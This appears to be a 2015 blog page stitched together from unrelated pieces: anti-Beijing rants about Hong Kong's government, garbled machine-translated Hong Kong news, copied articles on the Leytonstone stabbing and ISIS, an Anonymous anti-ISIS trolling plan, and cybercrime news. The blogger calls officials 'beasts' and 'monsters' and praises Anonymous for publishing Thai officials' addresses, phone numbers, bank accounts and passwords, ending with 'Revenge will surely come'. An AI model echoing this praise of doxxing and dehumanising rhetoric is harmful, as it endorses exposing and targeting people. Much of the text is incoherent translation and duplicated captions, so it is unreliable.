*-Update[04/12-2015]- Today Hong Kong's Legislative Council just as like as -...Corrupt regime in Thailand, Hong Kong - Formed faction "DAB" - built the establishment faction is by the dictatorship, authoritarian as like the mainland monster Xi Jinping, the instruction of Chi na slaves beast thief Wolf Leung Chun-ying, corruption and collusion in the darkness of self-interest sub-stealing government! The local Hong Kong residents to pay tax treasury!Mainland China-slaves beast thief Wolf Leung Chun-ying and Formed faction "DAB" arbitrarily take over Hong Kong people tax treasury fund squander on " great ( pay-over )white elephant" projects of garbage Mainland railway , machine, etc..."excess pay" places "wasting building"!-
-Update - [02/12-2015] - By sharing the great chivalrous Anonymous "AnonRogue" the most accurate information, all kinds of the (last)  analysis, maybe must to  loaded more  to make the reader to figure out the same by the great chivalrous Anonymous "AnonRogue" as the most accurate information share the main focus! Authoritarian cunning  mainland demons Xi Jinping slander of Turkey!- Is you Xi Jinping = this a cunning devil still can face to Putin,Mr.??!-Also Thanksgiving~
-更新-[02/12-2015]-由偉大俠義匿名" AnonRogue "的最準確資訊的分享,上文的各式分析可能還未令讀者弄清楚!加載同樣由偉大俠義匿名" AnonRogue "的最新最準確資訊的分享!土耳其被大陸獨裁狡猾妖魔習近平污蔑了!-虛偽極,,沒有誠信習近平獸,欺騙俄羅斯總統普京先生的謊言??!-Also Thanksgiving~-[01/12-2015]Update- From the great chivalrous Anonymous '' AnonRogue '' tribes - to find the most authentic
evidence, citing the {ntdtv.com} detailing News: "Malaysia Airlines MH370 missing alarming news!"-
‘You ain’t no Muslim bruv’: Britain unites in rejection of Leytonstone Tube station attacker

‘True Muslims don’t try and kill innocent bystanders’

People have come together to denounce the suspected Leytonstone attacker, who reportedly shouted “this is for Syria!” after stabbing three people inside a Tube station.
Police are treating it as a terrorist incident after the attacker purportedly suggested he acted in revenge for British air strikes on Isis in Syria, launched after a vote in the Commons just three days earlier.
And after a man could be heard in videos of the incident shouting “you ain’t no Muslim bruv” at the suspected attacker, the phrase has become a unifying call among people condemning the attack on social media.

The phrase became the top-trending hashtag on Twitter across the UK on Sunday morning, used by Muslims and non-Muslims alike to denounce hate.
Zeshaan Ali wrote on Twitter: “Whoever kills a person [unjustly]…it is as though he has killed all mankind.” (Qur’an, 5:32) #YouAintNoMuslimBruv.”
Another user, Paul Singh, said: “Never have I been prouder to be a #Londoner #YouAintNoMuslimBruv.”

 Video shows Leytonstone suspect arrested.

And S Zafar Abbas said: “#YouAintNoMuslimBruv proud to be British today with all the positive responses to hate.”
Others, particularly proud Londoners, praised the hashtag itself – and Russ Burt said: “#YouAintNoMuslimBruv - one man does more for community cohesion with one sentence than any government initiative.”

Writing on Facebook,  an Australian who was in the station at the time described what it was like to be caught up in the attack.
According to a post by his friend Mark Di Stefano, a Buzzfeed journalist, the witness said: “I was literally 20m away and saw people screaming and running away. F****** hectic.
“The psycho stabbed some guy in the neck and terrified hundreds. This isn’t some sick religious group gaining strength, it’s just some fucking lunatic.
“Don’t give these sick bastards power. Anyone that enjoys life is amazing, anyone that doesn’t bites. Rip it up, we’re legends.”




[23] network hairy fb Thousand speak Raab: To leave a mass movement against the draconian laws shall

 "Keyboard fronts" against Rights Amendment Bill was held yesterday afternoon the streets mind trick, often hairy part of the participants was suddenly accused of filibustering this reason there is no motion in the Legislative Council Neirab of LSD Legislative Councillor Leung Kwok-hung, he has promised to submit to clarify the spot about 900 amendments Wong Yuk-man filibuster together, but still surrounded by those who were part of the participants, and later on the Internet continues to accuse someone not long-haired Labrador. Longhaired yesterday detailed response in their facebook event, stressed submit amendments certainly is one way, but not only submit the amendment Raab, more importantly, is the second reading of the lengthy discussion among the speakers, Wong Yuk-man had asked him to submit amendments Youmao case, he said there was no submission, Wong Yuk-man it means to be applied due to eye surgery, it is hard when the shock Raab, "canal (Wong Yuk-man) asked me a drainage system all child 齐拉布 you agree, I have promised to the left canal. I promise left Yumin  wild Department always effective, I, together with the Department of Drainage a Qila Bu. "

Longhaired in fb refers constantly to speak on the motion or the amendment debate, each can speak 15 minutes, until no Member wishes to speak, will enter vetting namely itemized bill on the amendment and vote, but before the Legislative Council cut cloth, limit debate time. Thus, as each netizens referred solely to vote against and not stop Bill is passed, while Raab also one day be cut cloth, to leave regulation must rely on extra-parliamentary mass movement to make the point, but in favor (of all the members of 70 that fewer than 36 Members voted in favor), or there is a strong public opinion forced the government to withdraw regulations.

Longhaired yesterday said: "I was asked the meeting will Raab, I asked him the meeting would suspect others meals a generous heart for their generous Nuisance performance confidence, I know I'll Rab Rab may not be able to stop!! according to a draconian through, just as other Raab same, because the Legislative Council to change the surface structure caused by corruption generous generous royalist effect, rely on the mass movement, rather than inside the Legislative Council Legislative Council just tie a dispute  platform, Hard to win and tie a generous platform. "

When the matter yesterday when the source mind trick, the occupation had arrested "four eyes brother" Cheng Kam full statement claimed that the Council had to Wong Yuk-man willing to propose 903 amendments to this bill, "Raab" and urged "the self-proclaimed radical democrats such as People Power, LSD "to be filibustering to prevent draconian by the presence of long-haired immediately came to grab the microphone, Wong Yuk-man in Labrador during anti means in fact often not in parliament, namely surrounded by some of the participants who require long-haired say whether Raab, there was chaos , surrounded by hairy finger twice already agreed to join Wong Yuk-man, "Raab" ranks "(Yumin) Fathom day I come out and walk press with finger, then top drainage scared Wu Zhu, assistant Raab told me, I promise Zo le already" He is still eligible for release, and finally he has to leave by the police escort boarding.

 Chase real thing burst size city that like Apple [site] FB!



 - Today Hong Kong's Legislative Council just as like as -... Corrupt regime in Thailand, Hong Kong - Formed faction "DAB" - built the establishment faction is by the dictatorship, authoritarian as like the mainland monster Xi Jinping, the instruction of Chi na slaves beast thief Wolf Leung Chun-ying, corruption and collusion in the darkness of self-interest sub-stealing government! The local Hong Kong residents to pay tax treasury! Mainland China-slaves beast thief Wolf Leung Chun-ying and Formed faction " DAB "arbitrarily take over Hong Kong people tax treasury fund squander on" great (pay-over) white elephant "projects of garbage Mainland railway, machine, etc ..." excess pay "places" wasting building "! -
- Hong Kong's Legislative Council today just like -... Corrupt regime in Thailand, Hong Kong people built the establishment faction is by the dictatorship, authoritarian mainland monster Xi Jinping, the instruction of their slaves beast Leung Chun-ying, corruption and collusion in the darkness of self-interest sub-stealing thief Wolf government! The local Hong Kong residents to pay room tax savings SHE arbitrarily take over Hong Kong people squander room SHE tax on "white elephant" projects of railway Mainland garbage, machine, etc. .. excess drinking places "wasting building" savings! -

"Manland Continental vicious dictatorship, authoritarian monster Xi Jinping and cunning his slaves" coward "beast Leung Chun-ying,
And a group of people banditry Built " DAB " now misappropriation of property outside of Hong Kong people,
Blockade actually emulate Communist mainland and Thailand set up a name for the corrupt regime [23] network retrogression corruption ordinances,

Visible Hong Kong's Apple Daily news reports.
This demon behavior:
When would the international tribunal, freedom and democracy to the Head of State denounced them as "beasts as not " them??!

Just happened in the dark conscience,,  corrupt the government of Thailand,
It was the Thai people collective denounce!

Chivalrous Anonymous projecting force to "aid people",
The Thailand government group of the beast "dog party" name, address, phone, title, e-mail, as well as bank credit accounts and passwords are published on the public web!

In which national, how to treat the people, there will be corresponding results?!!

Chivalry anonymous way to tell the people everything real thing, but also for everyone, who has been hurt human rights - "justice"! -

Mr. Liang Guoxiong in Hong Kong continuously for support Hong Kong people to "fight in the end of the Human Right!"
More is the continent of the Liaison Office, mainland Travel Office, mainland Hybrid "Ministry = Foreign Affairs , the Central Daily News, People's Daily, World Journal, Universal daily newspaper, Wen Wei Po, etc .. mouthpiece of the Communist Party of slaves, indifferent tongued, Poison tongue framed!

Thief wolf Leung Chun-Ying and its corruption and incompetence of " DAB" establishment faction "Lick Communist Chrysanthemum" evil party. -
False accusation against Mr. Liang Guoxiong, causing him behind bars!
So this kind of dark filthy beast acts of corruption mainland monster Xi Jinping!
Which one was need next to be patient??!~
As a person,
In conscience and swastika conscience,
Must can not let this happen again!

Then when are the International tribunals, human rights organizations, will seizure the beast behavior of these extremists!?

In Germany, the Berlin Wall fell, so many people feeling free living in today,
Let people remember the results of the dictatorship's violent regime!
President Chancellor Merkel, in the grand anniversary commemoration of countless people's hearts to lead a new generation to enjoy freedom and democracy!

Russia President Putin,Mr. he has to protect the people! Led the warrior, the army , wiped out the evil terrorists ISIS impeccable!

President of France, Mr. Francois Outlander released world together,
led army attack "inhuman" ISIS extreme terrorists killed countless innocent lives!

In Syria strewn with dead bodies, Kurdish soldiers witnessed countless children a new "food botulinum bacterial" invasion,
Appear...in their weak eroded different parts of their body, so that a lot of body parts inflamed wounds!

Such a scenario with Chi na devil abused seizure of their own mainland people,
It is the same vicious criminal acts as the " ISIS "!

Our US President Obama,Mr., except cordial, Be very hard to build an excellent system!

In 2015,, chivalrous great Anonymous told us,

In the world everything of real things,
Who to hurt and killed the peoples??!
Will issued the largest complaint in every city!
Or against those - unjust, uncivilized, unfair, the shame of the demon, they must pay the price of sin to their acts!
Revenge will surely come..!!

Small as dust, Melody.Blog not fear of evil..
#OpISIS  #Opchina  #ophongkong  #OpThailand  #Op_Tibet@TrueTibet


















Islamic State Recruiting ‘City Wolves’ For ‘Guerrilla War In America’

 Doug Saunders/Los Angeles News Group via AP.A swat team arrives at the scene of a shooting in San Bernardino, Calif., on Wednesday, Dec. 2, 2015. Police responded to reports of an active shooter at a social services facility. ( MANDATORY CREDIT
 by Dan Riehl4 Dec 2015Washington, DC.

Terrorism and Middle East expert Erick Stakelbeck joined Sirius XM’s Breitbart News Daily host Stephen K. Bannon today to discuss ISIS’s trail of terror from France, Belgium and on to the United States.

“What ISIS wants to do is basically turn American and European cities into guerrilla war zones where you’re seeing a San Bernardino type of attack, you’re seeing a Paris style of attack, a Boston Bombing style of attack on a regular basis,” said Stakelbeck, who is also the author of “ISIS Exposed: Beheadings, Slavery, and the Hellish Reality of Radical Islam.”
“That’s the blueprint, that’s the goal,” added Stakelbeck, “because that’s what they’re saying.”
“ISIS is saying to every Muslim in the U.S. in Europe, become ‘city wolves,’ is what they call them. Rise up and become a one man, or a one woman Jihad,” he concluded.
Stakelbeck went on to speculate as to “who trained” the terrorists that struck in San Bernardino and where they were getting their money. “I think these are questions we’re going to learn a lot more about in the coming days.”
Breitbart News Daily can be heard on Sirius XM Patriot channel 125 weekdays from 6AM to 9AM EST.
The entire interview with Erick Stakelbeck can be heard below.



 特警隊到達聖貝納迪諾,加利福尼亞州拍攝的場景,在週三,12月2日,2015年警方回應積極的射手在社會服務設施的報告。 (強制性的信用
  丹·瑞爾 2015年12月4日 華盛頓.

恐怖主義和中東問題專家埃里克Stakelbeck加入Sirius XM公司的布賴特巴特新聞日報主機今天斯蒂芬K.班農從法國,比利時和美國討論恐怖ISIS的踪跡。

“ISIS希望做的是基本上把美國和歐洲城市到游擊戰爭地帶你看到一個聖貝納迪諾類型的攻擊,你看到攻擊的巴黎風格,進攻定期波士頓轟炸式的, “Stakelbeck,誰也對筆者說”ISIS暴露:斬首,奴隸制,與激進伊斯蘭的地獄般的現實 “。
“ISIS的話語,每一個穆斯林在美國,在歐洲,成為'狼市”,是他們給他們打電話。 站起來,成為一個男人,或一個女人的聖戰,“他總結道。
Stakelbeck繼續推測出“誰訓練”襲擊聖貝納迪諾和他們在那裡得到他們的錢的恐怖分子。 “我認為,這些都是我們要學習更多有關在未來幾天的問題。”
Taking out a Troll who thinks its funny that those people died yesterday.

Russia's 'Jihad Vlad' unmasked: ISIS executioner was the son of a Christian mother and was a 'bad pupil' who flunked his exams 

  • Anatoly Zemlyanka, 28, beheaded countryman Magomed Khasiev in Syria 
  • Born in Noyabrsk, Zemlyanka brought up Christian and converted to Islam 
  • Ex-teacher described him as very ordinary, adding 'He wasn't a hooligan'
  • Zemlyanka, on Russia's federal wanted list, went to Syria with a girlfriend 

The ISIS executioner who beheaded a suspected Russian spy in Syria was 'a bad student', his former school teacher said today.
Anatoly 'Tolya' Zemlyanka is being dubbed 'Jihad Vlad' after he murdered countryman Magomed Khasiev - and declared war on Moscow.
Zemlyanka, 28, told Russia president Vladimir Putin: 'Here today, on this blessed land, the battle [against Russia] begins. We shall kill your children for every child you've killed here.'
Scroll down for video
First picture: The ISIS executioner who beheaded a fellow Russian has been named as Anatoly Zemlyanka. Born in Noyabrsk, Siberia, Zemlyanka is the son of a Christian mother who ran a kitchenware shop
First picture: The ISIS executioner who beheaded a fellow Russian has been named as Anatoly Zemlyanka. Born in Noyabrsk, Siberia, Zemlyanka is the son of a Christian mother who ran a kitchenware shop
Unmasked: The Russian jihadi, 28, beheaded countryman Magomed Khasiev, who was accused of being a spy
Unmasked: The Russian jihadi, 28, beheaded countryman Magomed Khasiev, who was accused of being a spy
Born in Noyabrsk, Siberia, 230 miles south of the Arctic Circle, Zemlyanka is the son of an Orthodox Christian mother who ran a kitchenware shop while he was growing up.
Svetlana Zemlyanka, 53, who had at least one other son, closed the store selling cutlery, crockery, glassware and ceramics, three years ago.
A former teacher at Noyabrsk's school number three described Zemlyanka as an unremarkable pupil whose exam results were 'satisfactory at very best'.
'He was a bad student. His average score was, let's say, unsatisfactory or, at the very best, satisfactory,' they said.
'He wasn't a hooligan, quite the opposite, demure, and very ordinary.'
Zemlyanka, who is on Russia's federal wanted list, is said to have become a Muslim and founded a local Islamic organisation called Iskhan, which was banned by a court order.
He attended Thai boxing classes for two years before he left for Syria, reportedly with a girlfriend.
Local coach Oleg Zinner at Baylun sports club, said: 'He wasn't a regular. He came from to time. He is a handsome tall guy, very muscular, but as a sportsman he turned out to be quite weak, rotten.
'Other guys would pull themselves together after a defeat, and rush to fight back. But he wasn't that kind. Not a fighter's character. He would come time to time, sometimes he wouldn't be seen for a while.'
Zemlyanka became Russia's most wanted this week when he murdered Chechen loyalist Khasiev as he knelt next to a lake near what is thought to be the ISIS de-facto capital, Raqqa.
Khasiev was born in Chelyabinsk, in the Russian Urals mountains but orphaned aged nine and raised by adoptive parents in Chechnya.
The following year he became a Muslim and went on to study law at Maykop Polytechnic college, in the small Russian region of Adygea.
Khasiev - born Yevgeny Yudin before taking the name of his adoptive mother - is said to have ended up in Syria after being recruited by Russia's Federal Security Service, the FSB.
In February last year he was caught in possession of prescription medication, lyrica pills, and was known to have links to drug dealers. Khasiev is said to have done a deal with the FSB to avoid prosecution, it is claimed.
He was then sent to ISIS via Turkey and given the intelligence services information from behind enemy lines.
Khasiev's adoptive mother has told how she rescued him from an orphanage and gave him a new life in Chechnya - but also how he defied her opposition to him travelling to Syria.
Fighter: Zemlyanka did Thai boxing classes back home before he left for Syria. His trainer told MailOnline: 'As a sportsman he turned out to be quite weak. He wasn't a fighter'
Fighter: Zemlyanka did Thai boxing classes back home before he left for Syria. His trainer told MailOnline: 'As a sportsman he turned out to be quite weak. He wasn't a fighter'
Family: Mother of Zemlyanka, Svetlana, who is an orthodox Christian and ran a kitchen shop selling ceramics and cutlery, which closed three years ago
Family: Mother of Zemlyanka, Svetlana, who is an orthodox Christian and ran a kitchen shop selling ceramics and cutlery, which closed three years ago
School days: His former teacher described him as 'bad pupil', adding his exam results were 'satisfactory at very best' and said he was 'demure, and very ordinary'
School days: His former teacher described him as 'bad pupil', adding his exam results were 'satisfactory at very best' and said he was 'demure, and very ordinary'

The FSB has not given details on whether Khasiev was spying on terrorists and reporting back to Moscow.
Sources have played down the claims without issuing an outright denial.
It was also revealed Khasiev - who posted pictures of grenades on his social site - had a half brother called Alexey who serves in the Russian military potentially fighting the terrorist threat.
Khasiev's mother Markha Khasiyeva said: 'He lost his parents when he was a child, and was put in an orphanage, Gvardeysky orphanage where we took him from.'
She was childless and raised the Chelyabinsk-born orphan with her elderly father. 
'We really liked him: he was an honest, good, kind, thoughtful boy,' she said.
'In school he had a lot of good friends.'
'Today we found out about his feats. We're shocked, I even have nothing to say.'
She said: 'I lived with my old father, and he decided that there should be someone to look after me when I get old, as I was looking after him.
'He made a decision to adopt him and even gave him his name. My father loved him a lot.
'My older family and I always stood up for him.
'We never betrayed him.
'He was honest, very honest. I trusted him.'
Undercover: Magomed Khasiev, pictured, was rescued by his adoptive mother from an orphanage and given a new life in Chechnya
Undercover: Magomed Khasiev, pictured, was rescued by his adoptive mother from an orphanage and given a new life in Chechnya
Orphan: Khasiev's (pictured) adoptive mother Markha Khasiyeva said that she knew nothing of her son being with ISIS, or whether or not he was working as a spy
Orphan: Khasiev's (pictured) adoptive mother Markha Khasiyeva said that she knew nothing of her son being with ISIS, or whether or not he was working as a spy
She revealed that he had been in contact less with her the past year or so, saying he deliberately did not tell her about going to Syria, knowing she would not approve.
'We stayed in touch while he was studying,' she said.
'The last time I saw him in summer... autumn, when he came to see us.'
Asked if she knew he had travelled to join terrorists fighters - whether or not he was working for the FSB in doing so - she said: 'No, of course we didn't know.
'He was afraid even to talk about it, he never ever said anything about it. Of course, how would he say that? He knows I am against all such things so he hasn't told me. He always said, 'You will never be ashamed of me. Whatever you hear, I'll never blacken your family'.
'I just found out about it. I couldn't believe it.
'My neighbour told me.'
She watched the video but not the hideous footage showing the execution.
'He introduced himself there - name, family name, who was he working as, I saw this but I didn't see how he was killed,' she said.
'We stayed in touch as long as we could.
'Until he made us understand that it shouldn't be done.' 
'Spy': Chechen leader Ramzan Kadyrov admitted today that Khasiev could indeed have been an informer for Russian secret services
'Spy': Chechen leader Ramzan Kadyrov admitted today that Khasiev could indeed have been an informer for Russian secret services
Chechen leader Ramzan Kadyrov said today Khasiev could have been an informer for Russian secret services - while laying blame for his capture and murder with the West - claiming: 'We can say with some certainty that in this case there is a trace of the CIA.'
The ally of Vladimir Putin claimed that 'Western intelligence agencies' share with the leadership of the Islamic State 'data on persons who can perform certain tasks' for the Moscow secret services.
'The murder of Magomed Khasiev is a propaganda campaign by Ibliss gang (ISIS) and their patrons among Western intelligence agencies,' he said.  



San Bernardino shooting: 14 victims named as vigils held – latest updates | US news -

+-------The World against ISIS Project----+
+-------------For December 11-------------+

1-Basic Info
2-How to be Part of this
4-Why we are doing this

When: December 11 // All Day
What: We ask you to show your support and help against ISIS by joining us and trolling them // Do not think you have to be apart of Anonymous, anyone can do this and does not require any
special skills
Where: We ask to take part of this on Facebook // Twitter // Instagram // Youtube // In the "Real World"

  -Post mocking photos of Isis
   -While Using #Daesh and #Daeshbags
  -Post photos of goats while @ing Isis members with captions talking about their wives
  -Use #'s that many Isis members use and post mocking photos
  -While again using #'s Isis members use call them out on being Daesh
  -First @ Isis members call the attention of all your friends to them to suspend
  -While using #'s known for Isis members to use post photos of dead Isis members
  -Lets try to get #Daeshbags trending
  -Post photos showing you are not afraid against them
  -Openly call them Daesh
  -Post photos of captured Isis members and mock them
  -Find Isis accounts and out them to all of your friends asking to report
  -Openly call them Daesh and Deashbags
  -Spread mocking photos of Isis
  -Make mocking videos of Isis
  -Spread photos of dead/captured Isis members
  -Call to other youtubers to join in and to mock and belittle Isis members
  -Find any Isis accounts and report them
   +++Real Life+++
  -Print out photos that mock Isis and spread them around your city (be careful can be seen as bad if some dont understand you arent supporting but mocking)
  -Make stickers of mocking photos and put around your town
  -Print out pages showing how Isis does not represent Islam

   +++North America+++
  -Los Angeles,California - - - Los Angeles City Hall from 3pm-9pm
  -New York,New York - - - Central Park from 4pm-8pm
  -Seattle,Washington - - - Space Needle from 4pm-9pm
  -Mexico City,Mexico - - - Alameda Central from 6pm-10pm
  -Vancouver,Canada - - - Stanley Park from 3pm-8pm
  -London,England - - - Constitution Hill from 6pm-10pm
  -Paris,France - - - Tuileries Garden from 5pm-9pm
  -Madrid,Spain - - - Gran Via from 5pm-10pm
  -Cannes,France - - - Promenade de la Croisette from 5pm-9pm

   You may be wondering why we are "trolling" Isis and planning all these demonstrations against Isis. But to understand that you must first see how Isis works.
They thrive off of fear they hope that by their actions they can silence all of us and get us to just lay low and hide in fear. But what many forget and even they do is that there are
many more people in the world against them than for them. And that is the goal of this mass uprising, on December 11th we will show them that we are not afraid,we will not just hide
in our fear, we are the majority and with our strength in numbers we can make a real difference. We will mock them for the idiots they are. We will show them what they really are
they do not stand for a religion, they do not stand for a god, they are brainwashers teaching from the young to the old their propaganda against the "west" when in reality they are
just increasing the distance between countries by giving many a bad name. But we see behind their persona, we see them for who they really are. And we hope to see you all brothers and sisters
on December 11th. As we join together and show who we are,what we are and what we stand for. I will not see you on December 11th for I am not a person,but an idea of love and peace and
we will show them that we will prevail after all their horrors for they do not have any control on us. Please show others and support us on the 11th.....
It will be a day they never forget.



Crypto Reuse Opens Up Millions of Connected Devices to Attack (via News)

China's Underground Cyber-Crime Economy Grows in Size, Sophistication

By Robert Lemos  |  Posted 2015-12-01. China Cyber-Crime

While state-sponsored online espionage is most often associated with China, freelance cyber-crime is alive and well in the country, according to a recent research report.

The tool is called Social Engineering Master. Anyone who pays the equivalent of $50 can search through a variety of stolen or leaked information and use it to create a convincing cyber-attack targeted at a specific victim or group of victims.
 ld eWEEK.
"The big problem these days is not getting the data, but getting to the data that you want," he said. "They provide a tool that gives you a nice interface, so the cyber-criminals can create very compelling social engineering emails." While malware and hacking services continue to be a staple of the underground marketplace in China, criminals have branched out into other areas, according to Trend Micro.
Hacked hardware has gone from prototypes to polished products, especially such devices as payment-card readers, which can quickly skim financial information, the company stated. Legitimate-sounding services—such as boosting the rank of free apps in Apple's App Store and paying for dedicated servers—have doubled in price in some cases, while services more commonly associated with crime—such as buying hacked registration codes for software and renting botnets—have become cheaper. "While it is less open in China, this is now truly a marketplace," Budd said. "We no longer talk about it as a curiosity.
We are in the second, maybe third, generation of cyber-crime offerings." Take payment-card skimming. With non-cash transactions growing by more than a quarter in the past year, criminals are turning a greater focus toward stealing card data and using it for fraudulent transactions. For that purpose, criminals have developed advanced devices for skimming credit- and debit-card information, the Trend Micro report states. "We are seeing compromised payment card readers that are being mass-produced and they are being inserted into the legitimate supply chain without people realizing it," Budd said. "It is like the owners of a mom-and-pop restaurant going to the local version of Staples and buying what they think  is a legitimate card reader, but in reality, it is grabbing data from every transaction."

 The company found point-of-sale skimmers for sale on business-to-business sites, where they were likely bought to be resold to unwary retailers. The devices also had a new feature, which transmits stolen data through SMS text messages, usually used by phones, so cyber-criminals do not have to physically collect the data, the report stated.
Skimming also highlights the ways that China and the U.S. criminal markets can differ. While skimming is a popular way of grabbing payment-card information in the United States, criminals have focused on automated teller machines (ATMs) at banks, rather than point of sale devices, according to financial-service firm FICO.
 From January to April 9, 2015, the number of points of compromise increased by more than 170 percent at bank-owned ATMs in the United States, while it has dropped by more than 80 percent at U.S. retail points of sale. The trend in China, at least anecdotally, still seems focused on point-of-sale systems.

Unlike espionage, much of the crime in China focuses on domestic targets, according to experts. While a domestic systems integrator reportedly refrained from buying information stolen from well-known manufacturer Foxconn by a local group of hackers, a heavy machinery maker, Sany, allegedly hired hackers to infiltrate and steal information from its competitor in 2014, according to a report in the Financial Times. Three Sany executives were arrested during the investigation into the case, according to the article.

A study by Microsoft of PCs in China in 2011 found that four of 20 computers bought from retailers had malware pre-installed on the devices. In addition, while the United States and European countries rarely see mobile malware, malicious code—such as the recent XcodeGhost attack— is part of the mobile experience in China. "Currently, China's cyber-crime underground mostly targets Chinese citizens and businesses," said Doug Steelman, chief security officer for Dell SecureWorks, who oversees the CSO Human Intelligence Team. "However, we are beginning to see a few criminal groups offer hacking services targeting foreign websites or businesses." Chinese law enforcement agencies are aware of these different avenues of attacks and have investigated wrongdoing and cracked down on the underground markets and illegal online behavior, but face an uphill battle, Steelman said. "The ongoing challenge for them—as well as everyone fighting cyber-crime—is the difficulty in determining attribution and identifying the specific activities actually being carried out by hackers advertising their services, such as what is specifically being traded, who is being targeted, and with what success these attacks are carried out," he said in an email interview. 


Something Fishy About Florida Education Department's SeaWorld Promotion




Hackers turn up their noses at Darkode

forum resurrection

The notorious Darkode hacking forum is back -- but has been given a scathing review by security researchers.
By for Zero Day | December 2, 2015 -- 12:38 GMT.  screen-shot-2015-12-02-at-11-57-35.png

The Darkode black market, once a hotbed of software exploits and hacking tools, is clinging on to life despite the best efforts of law enforcement -- but is now little more than a shadow of its former self.
The Darkode forum, launched in 2007, was once a hotbed for criminals to snap up everything from hacking software to access to compromised company servers. However, the original .com domain was seized by law enforcement agencies several years ago.
Another version quickly popped up and was once again shut down, this time by the FBI, earlier this year. Over 70 people were arrested in connection with the forum.
Senior threat researcher Loucif Kharouni from Damballa says the company has been keeping an out for a resurrected version of the forum, and its vigilance was rewarded this week with the discovery of a new version of Darkode.

While nestled in the Dark Web to prevent unwanted eyes from spying upon the black hat trade of exploits, software vulnerabilities and hacking tools, the forum has received a failing mark when it comes to its own security thanks to poor design elements.
Kharouni first noticed Darkode's forum search is wide open for anyone to use without credentials or invitation -- a stark contrast to Darokode originally, which was password-protected and relied on a referral system to acquire new members.
In this case, once a search term is entered you can view member lists, topics and threads without any restrictions whatsoever.

A forum's security is only as good as its administrator, and the site's admin, dubbed Sven, is believed to be a former member of the original Darkode forum -- but he's not of the security caliber the previous admins were.

"Sven is a very generic handle but we know that he's a previous member of Darkode," Kharouni writes.
"As for the rest of the members, there is a mix of HackForum members usually called HF skids and DamageLab members. This gives you an idea about the quality of the forum.
In terms of security, the forum is also accessible without the Tor software. It can be accessed from any browser without anonymity. Another poor design of the forum."
Sven also offers members a Jabber service, an open protocol for instant messaging otherwise known as XMPP. However, the Russia-based server is poorly configured, with ports wide open on default settings -- giving anyone the opportunity to listen in.
The Openfire version installed to support Jabber is also out-of-date and subject to a number of severe security vulnerabilities.
The forum has shown no serious activity when it comes to the trade of Trojans, high-profile malware, access to compromised websites or the sale of hacking tools. Add this to the obvious issues with the forum and the conclusion that this version of Darkode is nothing more than a poor imitation of its former self, and there is little trust in the criminal community when it comes to using the forum.
Luckily for us, as this type of trading leads to data breaches, information theft and compromised systems which can threaten everything from our identities to our bank accounts.
Kharouni concludes:
"The criminal community has low trust in the 'new' Darkode forum. The lack of security and misconfiguration shows that Darkode can't be trusted and will never regain its former glory. Another Darkode fail. In previous times, we'd provide the link, but this time we aren't because it's just not worth anyone's time."



Australian Bureau of Meteorology tight-lipped on alleged Chinese hack

The ABC is reporting a cyber attack on the BOM that would take hundreds of millions of dollars to fix.
By | December 2, 2015 -- 02:43 GMT
The Australian Bureau of Meteorology (BOM) has asserted that its systems are fully operational and reliable in reponse to a report by the ABC that the weather bureau had suffered from a large breach.
"It could take years and cost hundreds of millions of dollars to fix," a source told the national broadcaster.
The ABC said it was told that the source of the attack was China.

In response, the BOM was tight-lipped.
"The Bureau does not comment on security matters," it said. "Like all government agencies, we work closely with the Australian Government security agencies."
Late last week, the Australian government released a second exposure draft of legislation requiring telecommunications providers to increase network protection and provide greater oversight to government agencies to intervene for the purpose of protecting national security.
Under the proposed legislation, carriers and carriage service providers "must do their best" to protect their networks against unauthorised access, with the Bill also vesting an information-gathering power "to facilitate compliance monitoring and compliance investigation activity" with the secretary of the AGD; provides the attorney-general with the vague power to direct a CSP "to do or not do a specified thing"; and outlines enforcement mechanisms and remedies for non-compliance.
The government also decided to retain its Department of Finance-run secure interdepartmental network, Intra Government Communications Network (ICON), last week.

"At this time, a potential sale or lease would not represent value for money for the government," Minister for Finance Mathias Cormann said on Friday.
"The scoping study found that ICON provides significant value to the government as a strategic asset, and is highly valued by government agencies for its low-cost and high-volume bandwidth, which facilitate the provision of secure, cost-effective telecommunications services."
China is regularly accused of conducting cyber attacks against the nations of the Five Eyes alliance -- comprising the US, the UK, Canada, Australia, and New Zealand.
In June this year, China was initially blamed as the source of an attack on the US Office of Personnel Management, which saw the personal details of over 22 million current, former, and prospective federal employees stolen.

By September, the US director of national intelligence James Clapper was more circumspect when giving testimony to a US Senate committee. Clapper said the attribution for the attack on the Office of Personnel Management was "not simple", and that there were "differing degrees of confidence" across the intelligence community as to who is to blame.

NSA director Admiral Michael Rogers told the committee that China was more persistent in terms of volume of cyber attacks against the US, but Russia was more capable.
Earlier in September, the US and China had signed an agreement to prevent economic espionage from being conducted online between the two countries. However in October, cloud security company Crowdstrike said China was continuing to attempt to breach US companies.
"The very first intrusion conducted by China-affiliated actors after the joint Xi-Obama announcement at the White House took place the very next day -- Saturday, September 26. We detected and stopped the actors, so no exfiltration of customer data actually took place, but the very fact that these attempts occurred highlights the need to remain vigilant despite the newly minted cyber agreement," Crowdstrike co-founder and CTO Dmitri Alperovitch said.
According to Alperovitch, hacking attempts were continuing to persistently occur, with SQL injection being the preferred attack vector used.
In July this year, US presidental hopeful Hillary Clinton told her Democratic party supporters that China is "trying to hack into everything that doesn't move in America" and stealing government information.

The United States launched Operation Inherent Resolve against IS targets in Syria in September 2014.
There have been almost 3,000 air strikes since then and more than 95 per cent of these have been conducted by the US, according to monitoring group Airwars.
The US has around 70 military aircrafts based in Qatar and on an aircraft carrier in the Persian Gulf, which consists of F-18 Super Hornets and F-16s, and A-10 Thunderbolt II and AC-130 Spectre gunships.

Gulf states

Saudi Arabia, Jordan, the UAE, Bahrain and Qatar have all taken part in some of the air strikes since they began last year.
The exact numbers of aircraft involved in the strikes is not known, but Saudi Arabia has 313 combat aircraft in its force, while the UAE has 157, Bahrain has 39 and Jordan has 38 F-16s in its air force.


In March this year, Canadian MPs voted to extend its Operation Impact campaign of strikes against IS in Iraq into Syria.
Canada has nine aircraft, including six combat craft, involved in the mission.
In October, then prime minister-elect Justin Trudeau announced the impending withdrawal of Canadian air forces from the theatre.


Turkey began striking IS targets in Syria in July and formally joined the US-led Coalition in August.
Turkey has around 335 combat capable aircraft in its force, making it one of the largest in the region.


Australian fighter jets carried out their first air strike on IS targets in Syria in September after the Government expanded a bombing campaign in Iraq.
Australia has conducted at least nine strikes on two targets since beginning the mission, named Operation Okra.
Craft including F/A-18A Hornets, an E-7A Wedgetail and a KC‑30A air-to-air refuelling aircraft are used in the operation.
About 780 ADF personnel have also deployed to the Middle East in support of the mission.


France's campaign in Syria, named Operation Chammal, began in September and stepped up its strikes in the wake of the Paris attacks that left 130 people dead.
